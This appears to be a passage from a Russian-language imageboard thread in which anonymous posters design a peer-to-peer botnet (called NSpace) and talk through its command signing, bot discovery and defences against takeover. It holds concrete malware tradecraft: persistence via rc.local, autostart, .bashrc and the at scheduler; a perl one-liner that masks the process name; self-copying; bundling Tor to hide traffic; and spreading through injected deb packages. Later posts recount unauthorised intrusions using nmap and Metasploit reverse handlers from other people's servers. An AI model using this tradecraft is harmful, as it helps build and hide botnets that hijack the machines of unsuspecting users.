Аноним Втр 02 Июл 2013 16:31:55  #150 №45759 

вверх

Аноним Втр 02 Июл 2013 18:56:51  #151 №45760 
1372777011993.jpg

При частично децентрализованой архитектуре как лучше устанавливать моды?Отправлять ботнетом надёжнее, но медленнее и сеть сильнее грузит.

%%Начал_думать_об_организации_сети-ОП.
Кстати, вот какие мысли:
Вместо собственно серверов будут серверы списков - веб-сервера, на которых какой-нибуть скрипт будет отдавать пары хост:порт нескольких ботов.Бот запускает сервер на каком-нибуть случайном порту, отдаёт скрипу свою пару хост:порт и отключается.Дальше бот подключается к другим ботам, и они, понемногу обмениваясь парами хост:порт, готовы слушать приказы.
Мастер запускает админ-скрипт, если нужно, вводит сервера списков, и прописывает задания.Скрипт считает цифровую подпись, подключается к серверам списков, забирает пары хост:порт, а дальше по очереди посылает подпись и задание ботам.
Каждый бот проверяет подпись, и если она совпадает с его внутренним открытым ключом, то отсылает задания дальше и выполняет его.

Кстати, при составлении задания его можно сначала закодировать в base64, затем зашифровать секретным ключом, и подписать этим ключём.Это нормально, или лучше использовать два секретных ключа?
Ну и для связи лучше же udp использовать?%%

Аноним Втр 02 Июл 2013 18:58:03  #152 №45761 

>>45760
...и тут же проебал разметку!

Аноним Втр 02 Июл 2013 19:39:46  #153 №45763 
1372779586555.png

>>45760
Привет НПространство-кун.
Помойму не плохая идея.
Значит к командному сайту будут подключаться только нескольно ботов? И потом будут передовать остальным?
А что если эти несколько ботов проебуться? Проебёться вся ботнет?
Алсо посмотри wen.ru для фейкодоменов, чтобы зарегистрироваться ничего не надо, даже в поле мыло можно написать [email protected] и будет всё ок.
Как на счёт сгущенки? Может-ли хомяк добраться до втоего ануса? По крайней мере он может добраться до списка сайтов прописанных в самом скрипте, поэтому наверное стоит регать домен и коннектиться к нему исключительно через тор.
Алсо бамп.

Аноним Втр 02 Июл 2013 19:45:13  #154 №45764 
1372779913754.jpg

>>45763

Аноним Втр 02 Июл 2013 19:45:36  #155 №45765 
1372779936674.png

>>45764

Аноним Втр 02 Июл 2013 19:46:02  #156 №45766 
1372779962563.jpg

>>45765

Аноним Втр 02 Июл 2013 20:19:44  #157 №45768 
1372781984100.jpg

>>45766

Аноним Втр 02 Июл 2013 20:21:27  #158 №45769 
1372782087123.jpg

>>45768

Аноним Втр 02 Июл 2013 20:28:48  #159 №45770 

>>45763
>регать домен и коннектиться через тор
Разумеется.И тут подойдёт не вен.ру, а любой бесплатный хостинг с поддержкой php, коих немало.Искать хостинг тоже через тор - иначе найдут, если захотят.
>будут подключаться несколько ботов
Первоначально к серверам списков будут подключаться все боты, и задания будут передаваться только между ботами.Потом часть ботов тоже станет обслуживать сеть, но тут надо подумать - или сделать их тоже веб-серверами, и тогда на хостинг потом можно будет забить, или сделать их на каком-нибуть простом протоколе.
Впрочем, профит от псевдовеб-версии очевиден - даже если сервер будет однопоточный, то если отдавать часть списков хост:порт, то эти сервера можно будет использовать вместо хостинга, обновив список серверов ботов.
То есть часть ботов позже сама станет притворяться веб-серверами, и их можно будет использовать паралельно с хостингом, при этом не меняя протокол.
Ну и можно сделать, чтобы сервера давали списки не только ботов, но и других серверов.

Аноним Втр 02 Июл 2013 20:32:19  #160 №45771 

>>45764
>>45765
>>45766
>>45768
>>45769
Поняша, это слишком быстро для тематики.

Аноним Втр 02 Июл 2013 20:38:47  #161 №45772 
1372783127402.jpg

>>45770
Понятненько, значит в будующем сайт совсем отпадает?
А как команды обновлять? К боту коннектиться?

Аноним Втр 02 Июл 2013 21:06:08  #162 №45773 

>>45772
Да.Админ-скрипт получает с серверов списки ботов, и каждому боту отсылает задание и подписанный хэш задания.

Аноним Втр 02 Июл 2013 21:15:29  #163 №45774 

>>45773
Я не понимат. Можешь нарисовать?

Аноним Втр 02 Июл 2013 22:09:35  #164 №45775 

ОПчик, я тебе подумать принёс. Учитывай, что исходный код будет доступен всем.
http://en.wikipedia.org/wiki/Sybil_attack
http://ru.wikipedia.org/wiki/Принцип_Керкгоффса

Аноним Втр 02 Июл 2013 23:24:43  #165 №45777 
1372793083056.jpg

Встретились.

Аноним Втр 02 Июл 2013 23:30:48  #166 №45778 

>>45775
>http://ru.wikipedia.org/wiki/Принцип_Керкгоффса
Openssl&RSA общедоступны, и их надёжность общепризнана.
>атака Сибилла
Не сильно могу в английский.Насколько я понял, там идётся про атаку на p2p-сети с системами рейтинга?Но я рейтинга толком и не планирую, просто если бот получает задание, и подпись этого задания, которая передаётся вместе с ним, отвечает ключу, который хранится у бота и есть открытым ключом мастера, то задание передаётся другим "знакомым" и выполняется, иначе - игнорируется.

Аноним Втр 02 Июл 2013 23:50:16  #167 №45779 

>>45778
>Openssl&RSA
Я же о применении принципа к твоей системе. В ней будет известно всё кроме ключа, поэтому я советую тебе оценить её с точки зрения человека, который хочет её сломать.
>атака Сибилла
Сибил это баба же.
>про атаку на p2p-сети с системами рейтинга
Скорее, с «системой доверия», но суть не в этом. Продумал ли ты механизм, помешающий мне, например, сообщить ботам/серверам о миллионах фейковых адресов, на которых якобы сидят другие боты? (Последствия объяснять не нужно?)

Аноним Срд 03 Июл 2013 09:15:13  #168 №45782 

>>45779
Хм.Допустим, бот подключается к серверу, получает часть списка, сервер сохраняет его айпи, бот отправляет порт, который будет слушать, и отключается.Дальше сервер сам пытается соединиться с тем ботом, и если получается - то добавляет бота в свой список, иначе - бот скорее всего за NAT'ом, и будет сам подключаться к ботам из списка.Ну и те боты тоже будут обмениваться списками, но тут уже, пожалуй, надо, чтобы у каждого бота был свой идентификатор и ЭЦП, тогда если кто-то получил подписанное мастером задание от такого бота, то добавляют его в список "надёжных".А если от надёжного бота приходит неправильно подписаное задание, то его удалить из списка надёжных, ведь он должен бы передавать дальше толькл правильно подписанные задания.

Аноним Срд 03 Июл 2013 12:09:21  #169 №45784 
1372838961214.jpg

Начал понемногу клепать p2p-версию.
Собственно, для этого нужно, чтобы боты постоянно работали, поэтому они должны постоянно висеть в списке процессов.С рутом всё ясно - он в моём скрипте и так прописан в обычную автозагрузку.В принципе, NSpace уже ориентирован на работу под рутом - и по основному способу распостранения, и по тому, что в p2p-режиме ему придётся постоянно работать tcp-сервером, что без суперправ затруднительно не хотет ебаться с udp.
Тогда в пользовательском режиме он будет брать задания, выполнять их и дальше висеть в списке заданий планировщика at, чтобы, не участвуя в работе сети, представлять собой только "рабочую силу".

И надо бы как-то маскироваться в режиме рута - или делать копию себя с другим именем в другой папке и выполнять её, или придумать что-нибуть еще.
Что думаешь, анон?

Аноним Срд 03 Июл 2013 12:11:55  #170 №45785 

>>45784
>Собственно
>В принципе
>Тогда
Слова-паразиты, слова-паразиты везде...

Аноним Срд 03 Июл 2013 13:01:17  #171 №45789 

>>45784
Впрочем, насчёт upd ещё надо решить, так что надо подумать насчёт маскировки.
Есть вариант "всё своё хранить в себе" - лог и моды хранить в скрипте, закодированными в gzip&base64, тогда можно будет ползать по файловой системе, и при запуске скрипт будет создавать свою копию и её прописывать в автозагрузку, в случае удачного выполнения перезаписывать копию собой.
Безумные идеи приветствуются.

Аноним Срд 03 Июл 2013 13:07:58  #172 №45790 

>>45789
>в случае удачного выполнения перезаписывать копию собой.
В случае p2p-реализации скрипта, копия просто дополняется логами/модами по мере надобности, в это время основной скрипт уже обслуживает сеть.
Во время перезагрузки пеки основной скрипт завершается, после запуска пеки копия удаляет родителя, создаёт свою копию и прописывает её в автозагрузку, подключается к сети, выполняет задания и сама начинает обслуживать сеть.

Аноним Срд 03 Июл 2013 13:44:17  #173 №45792 

>>45782
По первой части возражений нет, годно.
>те боты тоже будут обмениваться списками
Что помешает мне создать своего бота с идентификатором и ЭЦП, переслать им одно правильно задание, а затем отправить остальным фейкосписок с миллионом адресов? Или ты планируешь для каждого такого бота создавать ключи вручную?
>>45784
>ему придётся постоянно работать tcp-сервером, что без суперправ затруднительно
Ну вообще-то, без рута можно точно так же открывать порты выше 1024, как и под рутом.
>как-то маскироваться
perl -e '$0="Anything you want";sleep(10);'
Тогда в списке процессов перл будет отображаться так, как ты его назовешь. Как это делается в баше, не знаю. Может, с /proc/ поколдовать можно.

Аноним Срд 03 Июл 2013 16:12:20  #174 №45795 

>>45792
>можно создавать tcp-серверы на портах свыше 1024 без прав суперпользователя
Отлично, я думал, что так только с udp можно.
>подменять имя процеса через /proc
Потом гляну, как это можно сделать.Пока что постоянно копии создаёт и прописывает их в автозагрузку, а когда копия запускается, то удаляет оригинал и удаляет запись о своей автозагрузке, создаёт копию и прописывает её в автозагрузку, а дальше - основной цикл.
>для каждого бота создавать ключи вручную
В каком смысле "вручную"?OpenSSL'ом можно автоматически создавать и закрытые, и открытые ключи.
>фэйкосписок с миллионом адресов
А вот это плохо, тут уж надо ухищряться.Есть вариант - ограничить длину пакета несколькими килобайтами, и при получении списка все их проверить, и только идентификаторы тех ботов, которые передают правильно подписанные задания, добавить в список доверенных ботов.Единожды прислал неправильно подписанное задание - нахуй из списка доверенных.
Алсо, когда у бота уже есть список доверенных нодов, то в первую очередь он подключается к ним для того, чтобы пополнить список нодов и получить задания, и тогда он уже не подключается к серверам списков.Но если не получилось получить узнать задания или список доверенных пуст, тогда подключается к серверам списков.
Можно еще каждому заданию выдать номер, чтобы несколько раз не выполнялось одно задание, и ограничить время повторной ретрансляции задания по сети.

Кстати, не хочешь помочь мне?Если у тебя *nix и разбираешся в баше, мог бы проверять наброски кода на работоспособность/безопасность, а то я сейчас за чужим компом работаю, на котором только ХР, да один консольный liveUSB у меня на флешке...Если что - связь по мыльцу [email protected], только в треде заранее напиши, если согласен.

Аноним Срд 03 Июл 2013 17:11:43  #175 №45798 

>>45795
>В каком смысле "вручную"?
Пардон, забыл самое главное сказать. Имел в виду «подписывать мастер-ключом как верные». Если ключи ботов будут создаваться ботами самостоятельно, то возможно то, что я описал.
>при получении списка все их проверить
Очень плохая идея, ящитаю. Можно всё время подключаться и передавать новые адреса, бот только и будет делать, что проверять их.
>список доверенных нодов
А-тя-тя, я же говорил, что система доверия будет :3
Короче, это ещё стоит очень хорошо продумать, т.к. везде есть место для отсоса.
>помочь
Да я и так помогаю, собственно. Тестировать лень, мне бы своё дописать. Могу дать несколько серверов >>45554, гони ключик.
Алсо, ты меня заставил достать весенние разработки, я тогда делал p2p-бота на перле и пришёл к таким идеям:
1) У каждой ноды есть пара ключей, каждый запрос и ответ подписываются и проверяются.
2) Каждый бот ведёт свой список, ноды в нём разделяются на:
- Мастер-ноды. Фактически ничем не отличаются от остальных, но они стабильные, их мало, и их ключи подписаны мастер-ключом вручную.
- Ноды, к которым бот успешно подключился и получил ответ.
- Ноды, которые подключались к нам.
- Адреса, не входящие в первые три списка и полученные от других нод.
3) Адреса для подключения выбираются по очереди из четырёх списков. Таким образом, даже если несколько списков будут забиты говном, подключение к мастер-нодам всё равно будет работать.
4) В каждом запросе есть поле challenge и локальное время, каждый ответ должен содержать их же. Это предотвращает возможность выдачи себя за другую ноду, а-ля MItM.
5) И самая хитрая затея, почёрпнутая из биткойна, это поле nonce, которое вместе с pubkey соответствует определённому критерию. Простыми словами — для генерации ключа, который будет принят остальными другими, нужно потратить вычислительное время, от часа до суток на среднем ПК.
http://ru.wikipedia.org/wiki/Proof-of-work
Ебать настрочил простыню.

sageАноним Срд 03 Июл 2013 17:14:04  #176 №45801 

>>45798
>будет принят остальными другими

sageАноним Чтв 04 Июл 2013 04:58:50  #177 №45816 

>>45798
Это настолько эпично, что у меня даже нет слов.
Будто снова на криптаче, ей богу.
coffee
и давайте все же не так бурно всплывать, тут черти-то творится сейчас.
лишний спойлер

Аноним Чтв 04 Июл 2013 10:23:35  #178 №45819 

>>45798
>поле challenge
Wut?

Аноним Чтв 04 Июл 2013 13:32:08  #179 №45823 
1372930328578.jpg

>>45816
Пора бампать сажу, сажа сама не забампиться.

Аноним Чтв 04 Июл 2013 15:51:11  #180 №45827 

>>45816
О, что вы, не стоит.
>>45819
Ну просто ещё одно поле с рандомными цифрами, позволяющее быть уверенным, что мы получили свежий ответ, а не старый, кем-то когда-то подслушанный. Если этого не делать, одна нода вполне сможет притвориться другой, просто передав её ответ.

Аноним Чтв 04 Июл 2013 23:04:52  #181 №45854 
1372964692218.jpg

>>45774
Это еще продумать хорошо надо, и рисовать не только сложно, но и не имеет смысла, пока бот не будет нормально работать.

Аноним Птн 05 Июл 2013 18:33:13  #182 №45885 
1373034793106.png
Аноним Суб 06 Июл 2013 01:37:51  #183 №45894 

>>45795
>[email protected]
>1488.pro
Если это не твой сервер, возьми какой-нибудь публичный.
Мимо-безопасник

Аноним Суб 06 Июл 2013 01:41:27  #184 №45895 

Алсо, есть тор, есть скрытые сервисы в нём. Зачем придумывать свой велосипед?

Аноним Суб 06 Июл 2013 02:42:59  #185 №45898 

>>45895
Так что же, тор за собой везде тащить?

Аноним Суб 06 Июл 2013 05:04:06  #186 №45899 

>>45898
Хотя, совершенно внезапно, для спермы это не особая проблема, есть штандалон бинарник, который не палится АВ и с которым можно общаться по простейшему SOCKS5. Спасибо за пинок.

Аноним Суб 06 Июл 2013 10:25:23  #187 №45906 

>>45894
На тот домен привязана почта от яндекса.

Аноним Суб 06 Июл 2013 10:27:51  #188 №45907 

>>45899
>для спермы
>спасибо за пинок
Поняша?Или еще один разработчик весёлых скриптов?

Аноним Суб 06 Июл 2013 12:09:41  #189 №45908 

>>45906
А ты уверен, что владелец домена не может читать твою почту?

Аноним Суб 06 Июл 2013 12:11:23  #190 №45909 

>>45898
А что, линукс же. К тому же у нас рут есть, если уж мы в автозагрузку прописались. wget, configure, make поколодовать с профилем и вуаля.

Аноним Суб 06 Июл 2013 12:25:49  #191 №45910 

>>45907
>еще один разработчик весёлых скриптов
Ага.
>>45909
Если бы всё было так просто. Далеко не на каждом ПК есть dev-пакеты. Установить пакетным менеджером, говоришь? А вдруг там ад и содомия в виде смеси stable и testing как у меня и каждую зависимость вручную нужно разруливать?
Проще уже тогда бинарник с нужными библиотеками таскать и подгружать через LD_PRELOAD. И то не факт, что получится.

Аноним Суб 06 Июл 2013 13:37:07  #192 №45914 

>>45908
Думаю нет, но если потом нужно будет, дам яндексовское фэйкомыльцо.
>>45909
>в автозагрузку прописались
Не обязательно от рута же, можно через ~/.bashrc или планировщики, хотя через рут надёжней, да.
И хоть инъектор deb-пакетов работает, скрипт должен работать в любых условиях, а тор спокойно работает без прав суперпользователя, но тяжеловат.

Аноним Суб 06 Июл 2013 15:30:45  #193 №45919 

Вы чего, тор для линупсов идёт в бандле как и для окон, распаковал архивчик запустил start-tor-browser и всё. Какие зависимости? Вы ебануись?
Единственное что надо посмотреть это архитектуру так как тор х86 не взлетит на осе х64.
Вот скачайте сами посмотрите.


Everything you need to safely browse the Internet. This package requires no installation. Just extract it and run.



х86: https://www.torproject.org/dist/torbrowser/linux/tor-browser-gnu-linux-i686-2.3.25-10-dev-ru.tar.gz
х64: https://www.torproject.org/dist/torbrowser/linux/tor-browser-gnu-linux-x86_64-2.3.25-10-dev-ru.tar.gz
Аноним Суб 06 Июл 2013 15:58:19  #194 №45920 

>>45919
Собственно, там и есть
>бинарник с нужными библиотеками, подгружаемыми через LD_PRELOAD
Заработало на голом chroot'е дебиана.

Аноним Суб 06 Июл 2013 16:02:04  #195 №45921 

>>45920
>LD_PRELOAD
LD_LIBRARY_PATH и LDPATH, точнее.

Аноним Суб 06 Июл 2013 19:29:13  #196 №45922 
1373124553602.gif
Аноним Суб 06 Июл 2013 19:31:03  #197 №45923 
1373124663042.png
Аноним Суб 06 Июл 2013 19:35:13  #198 №45924 
1373124913510.png
Аноним Суб 06 Июл 2013 19:48:54  #199 №45926 
1373125734735.png
Аноним Вск 07 Июл 2013 17:40:43  #200 №45955 
1373204443591.png

>>45926

Аноним Вск 07 Июл 2013 17:41:16  #201 №45956 
1373204476398.png

>>45955

Аноним Вск 07 Июл 2013 17:41:46  #202 №45957 
1373204506028.png

>>45956

Аноним Вск 07 Июл 2013 17:42:20  #203 №45958 
1373204540245.png

>>45957

Аноним Вск 07 Июл 2013 17:42:45  #204 №45959 
1373204565656.png

>>45958

Аноним Вск 07 Июл 2013 17:43:26  #205 №45960 
1373204606883.jpg
Аноним Вск 07 Июл 2013 18:48:14  #206 №45961 
1373208494798.jpg

>>45798
>у каждой ноды есть пара ключей
Да.
>каждый бот ведёт свой список
Во время написания видно будет, а так: мастер ноды, доверенные ноды(те, которые подтвердили работой свой ключ и рассылают правильно подписанные мастером задания и сами правильно всё подписуют), чёрный список нод, и непроверенные ноды, к которым ещё не подключались и которые были получены от других.
>адреса для подключения выбираются из четырёх списков
Я думаю подключение к мастер-нодам оставить на крайний случай, ведь если
>их мало
то тогда на них будет сильно высокая нагрузка.
>поле challenge и локальное время
Да, ну и проверка этого времени, чтобы разница между ним и временем бота составляла не более 24 часа+несколько минут.
>Пункт 5
Годно.Я уже приблизительно представляю, как:
1. Бот генерирует закрытый ключ, вычисляет открытый.
2. Начинает подбирать такое число, что первые несколько символов хэша числа и открытого ключа равны некоторой общей для всех ботов последовательности, заданой ботмастером на начальном этапе создания ботнета(открытый ключ мастера использовать нет смысла, ибо нужна будет возможность менять ключи).
3. Рассылает нодам, получая подписанные подтверждения.
>Атя-тя, я же говорил, что система доверия будет
Я отрицал именно рейтинговую систему, представляя себе, как боты меряются рейтингами, т.е. просто какими-то числами aka временем стажа работы или количеством правильно подписанных заданий, лол.
>очень плохая идея
И правда, не подумал.Буду брать несколько из списка, около семи, остальные игнорировать.
>могу дать несколько серверов
Они мне понадобятся, но в будущем.Не к спеху же их забирать?

Кстати, есть мысль, как отказаться от серверов списков, но нужен, как всегда, взгляд со стороны:
Организовать систему гостевого трафика.То есть когда в чьей-то сети постоянно присутствуют несколько ботов, то они могут передавать задания других ботмастеров, пока в появляющейся сети нет активных нодов.
Бот, если нет активных нод, подключается к заранее указанным чужим нодам.Те, когда их просят передать чужое задание, говорят "иди нахуй, я уже занят", когда он уже обрабатывает 3 чужих запроса, или загадывает число, придумывает id задания, считает их хэш, даёт попрошайке id и хэш, отключается, добавляет в свой список ожидания.
Когда попрошайка находит число, он опять подключается к тому ноду, даёт число, нод его проверяет.Если срок действия числа не истёк, то он говорит "ок", запоминает чужое задание и отсоединяется.
Дальше он чужое задание добавляет в гостевой список, и если кто-то попросит у него задания для сети с другим открытым ключом ботмастера, то он даёт его.
Он подключается к другим трём ботам из своего списка, сам представляется попрошайкой и получает от каждого задания отгадать число, бот отгадывает числа в других процессах, основной процесс занят делами своей сети.
Так задание медленно идёт по чужой сети, лимит времени для хранения чужого задания ~9 дней.
Организующаяся сеть распостраняется, когда в ней появляются ноды, то задания боты получают через них.
Ну суть думаю ясна, а то я заебался писать.

Аноним Вск 07 Июл 2013 19:00:45  #207 №45962 
1373209245795.jpg

Ну и бамп.

Аноним Вск 07 Июл 2013 23:06:23  #208 №45969 

>>45961
>подключение к мастер-нодам оставить на крайний случай
>на них будет сильно высокая нагрузка
Ты себе слабо представляешь мощности современных ПК. Один даже самый захудалый сервер легко вытянет тысячу подключений в секунду при хорошем канале. А так да, это не особо принципиально, можно и на крайний случай оставить.
>проверка этого времени, чтобы разница между ним и временем бота
Лишнее вроде бы. Как проверка от ретрансляции не поможет — ретранслировать можно намного быстрее, чем за 24 часа, лол. Кроме того, потеряем какой-нибудь мелкий процент ботов, у которых время вообще по пизде пошло.
>первые несколько символов хэша числа и открытого ключа равны некоторой общей для всех ботов последовательности
Можно и так. Я просто ищу определённое кол-во нулей в начале sha256(pubkey+рандом). Главное просто время подобрать.
>Не к спеху же их забирать?
Абсолютно не к спеху.
>в чьей-то сети
>к чужим нодам
Имеешь в виду больше одного ботнета? Ну да, круто, я о таком как-то не задумывался.
Алсо, скорость p2p-сети не так мала, как ты представляешь. Те же говнофорки биткоина с сотней-другой нод распространяют сообщения чуть ли не мгновенно.

Аноним Пнд 08 Июл 2013 06:26:11  #209 №45976 

>>45969
>скорость p2p-сети не так мала
В целях безопасности каждый нод, когда распостраняет чужое задание в своей сети, выполняет подтверждение работой, которое занимает время.Работая при этом на свою сеть - основной процесс работает нодой, в других процессах выполняются задания других нод.
Это нужно, чтобы нельзя было "заддосить" сеть, беспрерывно посылая гостевые задания, и предотвратить забивание гостевого списка заданий мусором.
И да, надо будет прикинуть скорость вычисления задания не только одним, но и многими потоками - знать, какой длины число загадывать.

Сегодня читну опять про openssl.На клиентской стороне можно открывать защищенные соединения, если можно и по серверной гонять любые данные, буду его использовать.А то в бубунтах netcat-openbsd, где-то нормальный netcat, и у них немного синтаксис запуска отличается.

Аноним Пнд 08 Июл 2013 09:20:06  #210 №45977 

>>45976
>выполняются задания для других нод
В смысле отгадываются числа, которые загадали другие ноды, чтобы передать дальше чужое задание.

Аноним Пнд 08 Июл 2013 10:57:31  #211 №45978 
1373266651949.jpg

Никак не могу решить, как заставить ноду работать.Можно запилить поддержку netcat-openbsd для убунт и netcat-traditional, или разобраться с запуском openssl s_server.
Есть ли смысл шифроваться?

Аноним Пнд 08 Июл 2013 11:37:42  #212 №45979 

>>45978
С openssl s_client разобрался на примере почтового скрипта, вроде ничего сложного.Проблемы с s_server.

Аноним Пнд 08 Июл 2013 12:43:56  #213 №45980 

>>45979
Ключики нужно создать. openssl это уже оверхед, ящитаю. Оставь лучше в виде запасного варианта.

Аноним Пнд 08 Июл 2013 14:48:25  #214 №45981 
1373280505490.png
Аноним Втр 09 Июл 2013 20:22:52  #215 №46005 
1373386972113.gif
Аноним Втр 09 Июл 2013 20:41:07  #216 №46007 

>>46005
У меня от этой гифки ЭПИЛЕПСИЯ.

Аноним Срд 10 Июл 2013 17:06:45  #217 №46037 
1373461605053.jpg

Завтра-послезавтра выложу набросок кода, хотя там только получение задания.

Аноним Чтв 11 Июл 2013 19:58:02  #218 №46069 
1373558282877.jpg
Аноним Птн 12 Июл 2013 12:41:02  #219 №46077 

Блджад, по жаре голова не работает.Тут даже режим получения задания не совсем доделан.http://rghost.ru/47368989

Аноним Птн 12 Июл 2013 16:53:12  #220 №46081 

>>46077
Какой ужас :3

Аноним Птн 12 Июл 2013 18:01:09  #221 №46082 

>>46077
А почему не в раржепеге? Это уже не торт.

Аноним Птн 12 Июл 2013 18:46:43  #222 №46083 
1373640403981.jpg

>>46082
Да это же не сборка, тут и половины функциональности нет то есть скрипт нерабочий.Нормальные версии будут в раржпегах выходить, а это - чтобы красноглазогоспода прокоментировали.
>>46081
С ужасом согласен, но я непонимат твою улыбку.

Аноним Птн 12 Июл 2013 19:57:27  #223 №46084 

>>46077
На всякий случай, на редхатах rc.local находится в /etc/rc.d.

Аноним Птн 12 Июл 2013 20:00:12  #224 №46085 

>>46084
И, /var/log/messages хуёвый источник энтропии, не надо в -rand ничего писать, openssl сам найдёт.

Аноним Птн 12 Июл 2013 22:27:37  #225 №46086 

>>46084
>>46085
Ок, в понедельник поправлю.
Ты полностью код читал?
Всё задание мастера, если оно большое, делится на части, и размер ответа ноды на запрос "получение задания" имеет макс. размер 4096 байт со всеми подписями, ну ты понел.
Алсо, по поводу защиты от ретрансляции: тут я начал строчить простыню, но потом внимательно перечитал старые посты.
Сейчас бот не работает в два этапа: сначала подключается к нодам, и без всяких подписей просто забирает задание, если оно есть, выполняет его и сам становится нодом.Но тогда ботнет проще заддосить, если он постоянно будет давать задание всякому входящему запросу.
Перемещу подтверждение работой для открытого ключа на этап установки учитывая возможность прерывания программы, см. функцию _server, запрос тогда тоже будет содержать подпись, а если нода ещё не видела подтверждения открытого ключа, то тогда он сообщается.
Так будет хоть какая-то защита от ддоса - нужно будет делать подтверждение ключа, потом бы и фильтр-ограничитель придумать, чтоб банил гиперактивных ботов ну то есть добавлял в чёрный список.
Работы непочатый край, это не пару файликов с веб-сервера скачать.

Аноним Суб 13 Июл 2013 23:01:32  #226 №46108 

У меня от треда МАМА АМА КРИМИНАЛ.

Аноним Суб 13 Июл 2013 23:04:15  #227 №46109 

Бамп.

Аноним Вск 14 Июл 2013 11:51:02  #228 №46119 
1373788262818.jpg
Аноним Пнд 15 Июл 2013 03:26:57  #229 №46145 
1373844417942.jpg
Аноним Пнд 15 Июл 2013 23:02:33  #230 №46168 
1373914953760.jpg
Аноним Втр 16 Июл 2013 13:26:54  #231 №46176 
1373966814717.png
Аноним Втр 16 Июл 2013 13:27:25  #232 №46177 
1373966845049.png
Аноним Втр 16 Июл 2013 13:27:48  #233 №46178 
1373966868243.png
Аноним Втр 16 Июл 2013 13:28:08  #234 №46179 
1373966888709.png
Аноним Втр 16 Июл 2013 13:28:26  #235 №46180 
1373966906881.png
Аноним Втр 16 Июл 2013 13:28:47  #236 №46181 
1373966927774.png
Аноним Срд 17 Июл 2013 12:16:16  #237 №46216 
1374048976140.jpg
Аноним Чтв 18 Июл 2013 20:00:50  #238 №46247 

Завтра постараюсь выложить чуть допиленную версию тоже не рабочую.

Аноним Птн 19 Июл 2013 01:32:54  #239 №46252 
1374183174960.jpg

>>46247
Хорошо. Только ты не волнуйся.

Аноним Птн 19 Июл 2013 12:25:25  #240 №46263 
1374222325071.jpg

http://rghost.ru/47521426
Подтверждение открытого ключа на этапе установки.
Одна нода теперь может отдавать все части задания, если оно очень большое.
Ожидание ответа от ноды ограничивается не количеством данных, а временем привет slowloris.

Аноним Птн 19 Июл 2013 14:07:37  #241 №46268 

>>46263
спасибки

Аноним Суб 20 Июл 2013 10:15:46  #242 №46285 

>>46268
За что, лол?

Аноним Суб 20 Июл 2013 11:57:39  #243 №46286 

>>46285
За то что продолжаешь работать и выкладываешь ризультаты.

Аноним Суб 20 Июл 2013 13:21:38  #244 №46287 

>>46286
Пожалуйста.

Аноним Вск 21 Июл 2013 21:43:04  #245 №46305 
1374428584103.jpg
Аноним Вск 21 Июл 2013 21:43:51  #246 №46306 
1374428631519.jpg
Аноним Вск 21 Июл 2013 21:44:46  #247 №46307 
1374428686465.jpg
Аноним Вск 21 Июл 2013 21:47:45  #248 №46309 

>>46305
>>46306
>>46307
Лолд, аж схоронил

Аноним Пнд 22 Июл 2013 21:24:04  #249 №46323 
1374513844300.jpg
Аноним Втр 23 Июл 2013 01:21:10  #250 №46377 
1374528070584.png

Набегач, у меня истерика.
Со мной только что поговорили через Reverse Handler метасплойта. По крайней мере, я так сначала подумал. Сижу на чужом сервере, почти никого не трогаю, починяю примус. И тут ХУЯК БЛЯДЬ СООБЩЕНИЕ, пик релейтед.
Потом я успокоился и понял, что на самом деле это не через Reverse Handler. Это на том же сервере кто-то ещё залогинился по ssh, увидел мой nmap, прибил его и написал мне об этом в консоль. Так и не понял, «коллега» было в смысле «коллега по взлому» или это легальный владелец принял меня за своего коллегу.
Высказался, и аж потеплело.

Аноним Втр 23 Июл 2013 01:27:39  #251 №46378 
1374528459839.png

>>46377
Учитывая, что сайт на сервере рашкинской компании, а «коллега» пикрелейтед, можно догадаться, какого типа он «коллега».

Аноним Втр 23 Июл 2013 11:56:57  #252 №46383 
1374566217848.jpg

>>46378
Поздравляю, мир однозначно тесен.

Аноним Втр 23 Июл 2013 12:11:23  #253 №46384 

>>46377
Я бы на твоём месте серанул шлакоблоками.
Как метасплоитом реверс хандлер пробил? То есть, какя там дыра была?

Аноним Втр 23 Июл 2013 12:18:13  #254 №46385 

>>46384
Нету там дыры, ему другой хакир write в терминал сделал. В кз не интернет, а говно, фу оттуда работать

Аноним Втр 23 Июл 2013 22:25:19  #255 №46392 

>>46384
>метасплоитом реверс хандлер пробил
Лолшто? То ли ты падежи попутал, то ли хуйню спросил.
Всё было как сказал >>46385, но я бы не сильно удивился, если бы кто-нибудь кукарекнул мне в хэндлер — в конце-концов, он на это и рассчитан, только не для юзера, а для бекдора.

Аноним Втр 23 Июл 2013 22:31:14  #256 №46393 

>>46392
Подожди, он же держит соединение. Как в TCP-соединение чужого процесса кукарекнуть?

Аноним Втр 23 Июл 2013 23:34:38  #257 №46394 

>>46393
This:
[ ] падежи попутал
[x] хуйню спросил
Что такое reverse handler, знаешь вообще? Он держит открытый порт (4444 по умолчанию), к которому подключился бы бекдор. Бекдор может быть каким угодно. В моём случае это был обыкновенный текстовый шелл, поэтому хендлеру похуй, что за текст будет на входе — он с удовольствием повторит мне всё, что скажет ПО, подключившееся на 4444 порт.

Аноним Срд 24 Июл 2013 00:31:31  #258 №46395 

>>46394
Так оно же уже подключилось же. На другие соединения тебе надо было бы явно переключаться. Ну, короче, сам подумай, как твоего пика можно было бы добиться как-то ещё кроме write в терминал шелла.

Аноним Срд 24 Июл 2013 01:22:37  #259 №46396 

>>46389
Кто «оно» и куда подключилось? На пике процесс эксплуатации уязвимости в самом разгаре, шелла на удалённом сервере ещё нет.
Или тебя смущает, что в msf работает эксплоит, а в это время якобы-хендлер пишет в консоль? Ну так это нормально, такое даже в штатном режиме иногда бывает.
>как твоего пика можно было бы добиться как-то ещё кроме write в терминал шелла
Я же сказал, подключиться на 4444 порт неткатом и написать туда всё, что захочется. Reverse handler примет подключение и выплюнет мне в сонсоль всё, что там услышит. Другой вопрос, что он сперва напишет «Command shell session 1 opened (X.X.X.X:4444 → Y.Y.Y.Y:ZZZZZ) at $DATE», но об этом я как-то в первую минуту не подумал.
Алсо, меня пидорнули с этого сервера и обновили ПО, хотя до этого я вёл себя не менее нагло и заёбисто. Такие дела.

Аноним Срд 24 Июл 2013 01:23:23  #260 №46397 

>>46396>>46395
Не на тот пост ссылка, ну ты понел.

Аноним Срд 24 Июл 2013 01:44:38  #261 №46398 

>>46396
Я почему-то решил, что у тебя и метасплоент запущен в шелле, подключенном бекконнектом. Тогда левый неткат на порт был бы уже сессией 2, и чтоб увидеть, что он тебе пишет, надо было бы явно сказать session 2.
Чтоб пидорнули - может, им абузу накатали. Я вот на румынов всегда стучу их провайдерам и пишу, что лоеры готовят кейс в полис. Эти цыганские пидары даже впнами не пользуются, внаглую лезут со своих компов.

